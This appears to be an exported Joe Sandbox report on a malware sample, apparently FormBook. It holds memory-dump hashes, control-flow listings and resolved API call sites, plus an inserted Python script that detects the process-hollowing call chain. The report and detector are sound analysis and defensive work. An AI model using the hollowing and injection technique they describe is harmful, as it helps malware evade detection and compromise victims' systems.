                                                    • Instruction ID: afb8f736fa7f3b31f5b641dc374974ac16f21a47833f9b890ccc37f8a469dbbb
                                                    • Opcode Fuzzy Hash: 07d355589c84a3d8716419c67fbd7b30804c6ddaec4c4eaaec392c52054ac41f
                                                    • Instruction Fuzzy Hash: BCA2F8B4E012298FCB64DF29EEA469CBBF6BB88345F4051A9D509E7754EB705E80CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53b3b15abf260b285cb0f6e80fb910dca45c38d457e11d4aa9e5c7376c8da57d
                                                    • Instruction ID: 3799c4c973f180f01f3861f49b29a8f617dfd0eb6ecb368b4367836a190dfe85
                                                    • Opcode Fuzzy Hash: 53b3b15abf260b285cb0f6e80fb910dca45c38d457e11d4aa9e5c7376c8da57d
                                                    • Instruction Fuzzy Hash: D3C12E35A00619DFCB15CFA4D8849EEFBB2FF48304B16C659E905AB321D771E982CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0835c8b785b211ddc2dbc4aef247040f054f5866da3eb62dfa4f81d5e30ab85
                                                    • Instruction ID: ea4d2237b3727709aee2bf2b35d659fc76b3f1a99c9326cf9e36a522a3ea9e8a
                                                    • Opcode Fuzzy Hash: a0835c8b785b211ddc2dbc4aef247040f054f5866da3eb62dfa4f81d5e30ab85
                                                    • Instruction Fuzzy Hash: 0AC11874E05218DFCB58DF75D9A869CBBB6BB88304F1054A9D50AEB364EB306E81CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6529d53d08b252106b1a5d16ce9c56a9850747ee3002e5b1313794fbea99122e
                                                    • Instruction ID: be452fb3bfd91de3b87d12dc0f3b3b84ba6b76337d024ee0474aec1df710a6f5
                                                    • Opcode Fuzzy Hash: 6529d53d08b252106b1a5d16ce9c56a9850747ee3002e5b1313794fbea99122e
                                                    • Instruction Fuzzy Hash: D9C10774E05218DFCB58DF65D9A869CBBB6BB88304F1054A9D50AEB364EB306E81CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f18831a9e7c044d298647514165666e1361ac11edfaaf34c22e58213939d785b
                                                    • Instruction ID: 5c880cd653afa0d29c9eb6bd8affad9d38e86118768e38f3f7e13803442c9758
                                                    • Opcode Fuzzy Hash: f18831a9e7c044d298647514165666e1361ac11edfaaf34c22e58213939d785b
                                                    • Instruction Fuzzy Hash: ACA11035E10619DFCB15CFA4D8849AEFBB2FF49304B26C655E905AB321D771E882CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph (block colouring for executed / not executed is not preserved in this text export; each node is listed as "id start-end [called API]", each edge as "from->to")
                                                     1302 e9e940-e9e9d5 1304 e9e9e0-e9e9e7 1302->1304 1305 e9e9d7-e9e9dd 1302->1305 1306 e9e9e9-e9e9ef 1304->1306 1307 e9e9f2-e9ea68 1304->1307 1305->1304 1306->1307 1310 e9ea6a-e9ea74 1307->1310 1311 e9eaa1-e9eb69 CreateProcessW 1307->1311 1310->1311 1312 e9ea76-e9ea78 1310->1312 1321 e9eb6b-e9eb71 1311->1321 1322 e9eb72-e9ec4d 1311->1322 1314 e9ea9b-e9ea9e 1312->1314 1315 e9ea7a-e9ea84 1312->1315 1314->1311 1316 e9ea88-e9ea97 1315->1316 1317 e9ea86 1315->1317 1316->1316 1318 e9ea99 1316->1318 1317->1316 1318->1314 1321->1322 1333 e9ec5c-e9ec60 1322->1333 1334 e9ec4f-e9ec52 1322->1334 1335 e9ec6f-e9ec73 1333->1335 1336 e9ec62-e9ec65 1333->1336 1334->1333 1337 e9ec83-e9ec87 1335->1337 1338 e9ec75-e9ec79 1335->1338 1336->1335 1340 e9ec99-e9ec9d 1337->1340 1341 e9ec89-e9ec8f 1337->1341 1338->1337 1339 e9ec7b 1338->1339 1339->1337 1342 e9ec9f-e9ecab 1340->1342 1343 e9ecae 1340->1343 1341->1340 1342->1343
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E9EB56
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: d412d15c8ee9122ffcb9dc458963d37b45369b14316d36958774863436a443c3
                                                    • Instruction ID: 1f9d9c1c7edd8bf91b03507b29fd62e83ef2df50d1197ec97ffcc056b743875e
                                                    • Opcode Fuzzy Hash: d412d15c8ee9122ffcb9dc458963d37b45369b14316d36958774863436a443c3
                                                    • Instruction Fuzzy Hash: FBA14871D006198BDF20CFA8C8416DDBBB2BF48308F258569D949BB240DB756E89CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph (block colouring for executed / not executed is not preserved in this text export)
                                                     • 1371: 1f29e8-1f2a71, calls VirtualProtect → 1374, 1375
                                                     • 1375: 1f2a73-1f2a79 → 1374
                                                     • 1374: 1f2a7a-1f2aaa
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001F2A64
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 63b4a7d73eef84c9d31adbd941e73e3b89855f32a01d901affe7a83df5762f64
                                                    • Instruction ID: 1c0e63c005479d55f5964bd9b3e30100cfb62ad437295b6f9a86aaecf691d13f
                                                    • Opcode Fuzzy Hash: 63b4a7d73eef84c9d31adbd941e73e3b89855f32a01d901affe7a83df5762f64
                                                    • Instruction Fuzzy Hash: 412139719006099FDB10CFAAC844BEEBBB1AF88314F51842ED519A7240DB799A44CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph (block colouring for executed / not executed is not preserved in this text export)
                                                     • 1395: 1f29f0-1f2a71, calls VirtualProtect → 1398, 1399
                                                     • 1399: 1f2a73-1f2a79 → 1398
                                                     • 1398: 1f2a7a-1f2aaa
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001F2A64
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: da2f145c3e41f2fc7d19d42e7bdea11e4fcc49be4df15d52118907b91d128fe7
                                                    • Instruction ID: c8befd4f03dc2bf5194b27c99c75bac16f6c11d9db7848c77ffe3d6d5ce098b9
                                                    • Opcode Fuzzy Hash: da2f145c3e41f2fc7d19d42e7bdea11e4fcc49be4df15d52118907b91d128fe7
                                                    • Instruction Fuzzy Hash: 532115719006099FDB10CFAAC8447EEFBF4AF88314F51882ED519A7240DB78AA44CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,00000000,?,?,?,?), ref: 00343679
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945814327.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_340000_Client.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 47eecc3530ee31e14013908c617152bcce5dfd9976c88c29b39c0c0f716d2781
                                                    • Instruction ID: 224dd45569c0206d13915806ecd562a0db053e4b10972fe5bab633396a71c742
                                                    • Opcode Fuzzy Hash: 47eecc3530ee31e14013908c617152bcce5dfd9976c88c29b39c0c0f716d2781
                                                    • Instruction Fuzzy Hash: 191129719006099FDB10CFA9D8447EFBBF5EF49314F21881DE515B7250CB79A954CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
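
The resolved call sites listed above (CreateProcessW, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread, together with VirtualProtect, VirtualAllocExNuma and the direct ntdll calls NtQuerySystemInformation and LdrLoadDll) are the raw material behind the report's "process hollowing" and "thread injection" signatures. The Python below is an added example, not part of the Joe Sandbox report and not FormBook code: it parses the "APIs" and "Memory Dump Source" lines exactly as they are printed in this section, pairs each call site with the dump region it was disassembled from, and reports the hollowing chain when all four calls resolve inside one process. The sample input is the lines copied from this page. Reading the fifth dotted field of the .sdmp file name as the region's page protection (0x40 = PAGE_EXECUTE_READWRITE) is an assumption about Joe Sandbox's dump naming, not something the report states; the parameter-count table comes from the documented Win32 and Nt prototypes and is only used to sanity-check the parser.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: the "APIs" and "Memory Dump Source" lines copied from the
# Joe Sandbox IDA Plugin section of this report. Each resolved call site is
# followed by the dump file its disassembly was taken from.
REPORT_LINES = """\
• NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 001F2514
• Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
• LdrLoadDll.NTDLL(?,?,?,?), ref: 003635CD
• Source File: 00000005.00000002.945869489.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04C4B46F
• Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
• NtResumeThread.NTDLL(?,?), ref: 00E9F16E
• Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
• NtSetContextThread.NTDLL(?,?), ref: 00E9DC75
• Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
• CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E9EB56
• Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 001F2A64
• Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
• VirtualAllocExNuma.KERNELBASE(?,00000000,?,?,?,?), ref: 00343679
• Source File: 00000005.00000002.945814327.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
"""

API_RE = re.compile(
    r"(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
# The .sdmp name is read as <pid>.<dump>.<id>.<base>.<protect>.<three more fields>.sdmp.
# Treating the fifth field as the page protection (0x40 = PAGE_EXECUTE_READWRITE)
# is an assumption about Joe Sandbox's naming; the report does not spell it out.
DUMP_RE = re.compile(
    r"Source File:\s*(?P<pid>\d{8})\.(?P<dump>\d{8})\.\d+\."
    r"[0-9A-Fa-f]{16}\.(?P<protect>[0-9A-Fa-f]{8})(?:\.[0-9A-Fa-f]{8}){3}\.sdmp,"
    r"\s*Offset:\s*(?P<base>[0-9A-Fa-f]{8}),\s*based on PE:\s*(?P<pe>true|false)"
)
PAGE_EXECUTE_READWRITE = 0x40

# Parameter counts from the documented prototypes; used to sanity-check parsing.
EXPECTED_ARGC = {
    "CreateProcessW": 10, "NtWriteVirtualMemory": 5, "NtSetContextThread": 2,
    "NtResumeThread": 2, "VirtualProtect": 4, "VirtualAllocExNuma": 6,
    "LdrLoadDll": 4, "NtQuerySystemInformation": 4,
}
# Calls that together make up process hollowing with thread-context hijack.
HOLLOWING_CHAIN = ("CreateProcessW", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread")


@dataclass(frozen=True)
class CallSite:
    api: str
    module: str
    argc: int
    ref: int          # address of the call instruction
    pid: str          # Joe Sandbox process index
    region_base: int  # start of the dumped region the call sits in
    protect: int      # region page protection (see assumption above)
    pe_backed: bool   # "based on PE": region maps an image on disk


def parse_call_sites(text):
    """Pair each resolved API line with the dump line that follows it."""
    sites, pending = [], None
    for line in text.splitlines():
        m = API_RE.search(line)
        if m:
            pending = m
            continue
        d = DUMP_RE.search(line)
        if d and pending is not None:
            argc = len([a for a in pending["args"].split(",") if a.strip()])
            sites.append(CallSite(
                api=pending["api"], module=pending["module"], argc=argc,
                ref=int(pending["ref"], 16), pid=d["pid"],
                region_base=int(d["base"], 16), protect=int(d["protect"], 16),
                pe_backed=(d["pe"] == "true"),
            ))
            pending = None
    return sites


def assess(sites):
    """Group call sites per process / region and flag the hollowing chain."""
    apis_by_pid, apis_by_region = defaultdict(set), defaultdict(set)
    for s in sites:
        apis_by_pid[s.pid].add(s.api)
        apis_by_region[f"{s.pid}/{s.region_base:#010x}"].add(s.api)
    return {
        # every call of the chain resolved inside one process
        "hollowing_chain_pids": sorted(
            pid for pid, apis in apis_by_pid.items() if set(HOLLOWING_CHAIN) <= apis),
        # call sites living in RWX memory that is not backed by a PE on disk
        "rwx_unbacked_call_sites": sum(
            1 for s in sites if s.protect == PAGE_EXECUTE_READWRITE and not s.pe_backed),
        # Nt*/Ldr* called straight from ntdll rather than via kernel32 wrappers
        "direct_ntdll_apis": sorted({s.api for s in sites if s.module.upper() == "NTDLL"}),
        # parsed argument counts that disagree with the documented prototype
        "argc_mismatches": [s.api for s in sites
                            if s.api in EXPECTED_ARGC and EXPECTED_ARGC[s.api] != s.argc],
        "regions": {k: sorted(v) for k, v in apis_by_region.items()},
    }


if __name__ == "__main__":
    for key, value in assess(parse_call_sites(REPORT_LINES)).items():
        print(f"{key}: {value}")
```

Run as a script it prints one line per finding; on the lines above it reports the chain for process index 00000005, all eight call sites in RWX memory with no backing image, and the three thread-hijack calls (CreateProcessW, NtSetContextThread, NtResumeThread) clustered in the 00E90000 region. The parameter-count check is there because these report lines are extracted text; a mismatch means a line was mangled, not that the sample is benign.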

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: dYe_
                                                    • API String ID: 0-355695088
                                                    • Opcode ID: 1752762c9be0a9fc4e37a1ba9880f63b625a9b525c9c9ae02252cd0bb3aabc79
                                                    • Instruction ID: 4ef84e544ab2d58cc7eda61daf720adb614011863b353d3b71f5bd822c3f9182
                                                    • Opcode Fuzzy Hash: 1752762c9be0a9fc4e37a1ba9880f63b625a9b525c9c9ae02252cd0bb3aabc79
                                                    • Instruction Fuzzy Hash: 3E512A74F053198FDB68DF64C990A9DB7F1BB89214F5144E9C50AEB741EB30AE808F92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G8Mq
                                                    • API String ID: 0-1865055058
                                                    • Opcode ID: e77ecd634271d87c094b74d4891da2744727870e3c7fb58d2c137bb54b021fd2
                                                    • Instruction ID: 5c8edd28c055883cbba78cd3285dba722d43e6bbc49e4c77bd8172e66157a12c
                                                    • Opcode Fuzzy Hash: e77ecd634271d87c094b74d4891da2744727870e3c7fb58d2c137bb54b021fd2
                                                    • Instruction Fuzzy Hash: 26312131E04105CFCB18DBB4D6A06A9BBF2A785254B5604AECA06FF784EF309C00C7D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 10a1a7fc03a89d6fcaa0753f9ca635e85bc84954edc8c1d8edb104ba87c58f7f
                                                    • Instruction ID: d67055541cfaba8ec465c648b8f8640c6da25672f68d369afd460a3a61ebc667
                                                    • Opcode Fuzzy Hash: 10a1a7fc03a89d6fcaa0753f9ca635e85bc84954edc8c1d8edb104ba87c58f7f
                                                    • Instruction Fuzzy Hash: 5111D4749002288FCB29DF60ED595D8BBB5BB8C740F1059E9D40AA7264DB786FC1CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16a272f69feb5d480c21dfbe0072320b33d5687d8ca9eeff05cfd91856864e78
                                                    • Instruction ID: e1e85a33871fd49c5c54108543c9b3c8d3a119ec5c89a5a042afbdbfa9b028b8
                                                    • Opcode Fuzzy Hash: 16a272f69feb5d480c21dfbe0072320b33d5687d8ca9eeff05cfd91856864e78
                                                    • Instruction Fuzzy Hash: 34014831E042288FDB58DF75C95069DBBF0AB8A315F1240D5D949FB350DB30AD808F92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69595740592bbe17de7be96b9bb5e7d77a825bae08dc8720c3a792ea538f464a
                                                    • Instruction ID: 56aa2ecbfe8819498e6ba9d84cc2be4bfb536ff792ca34ffc66cce89d38d0a6d
                                                    • Opcode Fuzzy Hash: 69595740592bbe17de7be96b9bb5e7d77a825bae08dc8720c3a792ea538f464a
                                                    • Instruction Fuzzy Hash: 47F089783062044F8308D72ED9405557BD7A7CA351358E5FAD509CB758DB31DD45C750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a722a2efa6f37cf988d10bdaf7d9cd1cf59300cb99dcbf76aa1387b3cd99a51
                                                    • Instruction ID: de9efe6aa4f33ad4012670563c6aa0d30ebdad3384ad751c9659d2484bd9dab4
                                                    • Opcode Fuzzy Hash: 0a722a2efa6f37cf988d10bdaf7d9cd1cf59300cb99dcbf76aa1387b3cd99a51
                                                    • Instruction Fuzzy Hash: ABF02436B090245B870CAB29AA40862BBAFD7C9610309E037D9059F7AACA349C068BC0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955803392.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c60000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 94273b09895f79ca1291f652fa607889f1dc73d97b434477a0b72e10d62f4494
                                                    • Instruction ID: 11b29e6b623de391470fadd43e49d55562b701aadcbe60b5fdfe0af3bd437c0f
                                                    • Opcode Fuzzy Hash: 94273b09895f79ca1291f652fa607889f1dc73d97b434477a0b72e10d62f4494
                                                    • Instruction Fuzzy Hash: A0F097393061588BC308DA2DEA608623B9BA7C220834CC47FD90ACBB0DDA31EC00C7D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 452820cdef564e3f03459c7dc8e645c1f8f7caa3ad0d1b9c4bbc9588a3d60975
                                                    • Instruction ID: 6a4b5ef53741c7ecaf79efc52b3d6f8c0a7c65a59a47db8c214d7000f9f12d82
                                                    • Opcode Fuzzy Hash: 452820cdef564e3f03459c7dc8e645c1f8f7caa3ad0d1b9c4bbc9588a3d60975
                                                    • Instruction Fuzzy Hash: 78015E74F022198FCB64DB749A60ABD77F26BD8108F1004DAC449BB790EE319D908F40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4000450b3463365796790c6a1bb88fee9f6bde654c783f57ce80c51586d31223
                                                    • Instruction ID: 270b75349235f04663924b63077d6f3a4a3f86367ae2e610a6993977eef1a6a8
                                                    • Opcode Fuzzy Hash: 4000450b3463365796790c6a1bb88fee9f6bde654c783f57ce80c51586d31223
                                                    • Instruction Fuzzy Hash: C7F0E2343042408B8709DB29E9408AA7F97D7C5311359D4B7D1068F75CCB30DC058B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93766b714483384deaf06442577a08391d14005dfa42a07cf435adee5f28dc15
                                                    • Instruction ID: 29edd054d68dcd9fcc33be0f9dd21019c5a227bede2017951c8596b558a13574
                                                    • Opcode Fuzzy Hash: 93766b714483384deaf06442577a08391d14005dfa42a07cf435adee5f28dc15
                                                    • Instruction Fuzzy Hash: 37F082787040554B8718DB2EE9444657BDBD7C9351345D5B7D50ACF359DB30DC018651
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 557991c4be620db25246edf73c42df26d8ca85719ad169ac413e85cd012e5197
                                                    • Instruction ID: 3b55b3cca340603a460d64899e50190770b37cbc862f3d79386e888c169602f0
                                                    • Opcode Fuzzy Hash: 557991c4be620db25246edf73c42df26d8ca85719ad169ac413e85cd012e5197
                                                    • Instruction Fuzzy Hash: 04F05538B052004F9308EFAAED444657BE3E3C6210318D5E2C6058FB1CCB71EC028BE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4e40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40ed5f50aa8e6eb4182388f671d0665e1808e8680c8f11f298e0f1f2154328a1
                                                    • Instruction ID: 2fcf63b403c1a38a3be4a618f5a9d2a1efbe4386c32c0293dcc8b43273fa84cc
                                                    • Opcode Fuzzy Hash: 40ed5f50aa8e6eb4182388f671d0665e1808e8680c8f11f298e0f1f2154328a1
                                                    • Instruction Fuzzy Hash: 27016938A04210CFCB59DF24D994958FBF2FB88304F149489D909AB368DB30AD81CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbaad7c58d7501d62e5f6e50b0518326442093c43301bf1992c36477d395a505
                                                    • Instruction ID: ca7f3a54c62c302eb255b6d9112505ab24b56df4d9cd6f53838e0bbdd18f8565
                                                    • Opcode Fuzzy Hash: cbaad7c58d7501d62e5f6e50b0518326442093c43301bf1992c36477d395a505
                                                    • Instruction Fuzzy Hash: F7F09775E042288FCB54DF74C558698BBF1AF49315F1644E9D50AEB760DF34AE808F41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947067483.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_d00000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 23ce3fee582294998fba06567e627715edb37ef3703ec4f71c8ae3abb93511f1
                                                    • Instruction ID: 2b0bc0f3f3acecac9d6b9fe4720606c82b3bf29ce0a48e6f3b1b6e8436d8ad64
                                                    • Opcode Fuzzy Hash: 23ce3fee582294998fba06567e627715edb37ef3703ec4f71c8ae3abb93511f1
                                                    • Instruction Fuzzy Hash: 20F039B0E14608CFDB08EFA4C481A9EBBF6EF84704B958569C518EF765DB31A841CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.946986991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_b50000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 865ffe4c40f02df71104fa62321041f95cc32670789514f6eb8e44fe2690295e
                                                    • Instruction ID: c5965a6848f903841cda9d3d2f4383df0fd2ee92dc82941e7e92f18001f2ff39
                                                    • Opcode Fuzzy Hash: 865ffe4c40f02df71104fa62321041f95cc32670789514f6eb8e44fe2690295e
                                                    • Instruction Fuzzy Hash: A3E0C971E042248FDB18DF35D56469D7BB0AB89314F0200D9DA09EB660DB30AD408F51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955901333.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
